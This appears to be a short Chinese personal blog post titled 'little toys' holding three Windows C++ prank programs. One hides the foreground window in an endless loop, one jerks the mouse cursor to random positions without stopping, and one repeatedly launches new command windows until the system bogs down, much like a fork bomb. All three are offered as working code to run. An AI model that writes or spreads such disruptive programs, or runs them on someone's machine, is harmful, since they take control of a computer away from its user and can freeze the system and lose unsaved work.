- 2026suzhongcheng 的博客
小玩具
- 2024-7-6 13:00:18 @
#include<windows.h>
using namespace std;
int main()
{
while(1)
{
HWND hWnd=GetForegroundWindow();
ShowWindow(hWnd,SW_HIDE);
}
}
#include<windows.h>
#include<ctime>
using namespace std;
int main(){
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
while(1)
SetCursorPos(rand()%x,rand()%y);return 0;}
#include<bits/stdc++.h>
using namespace std;
int main()
{
for(;;)
{
system("start cmd");
}
return 0;
}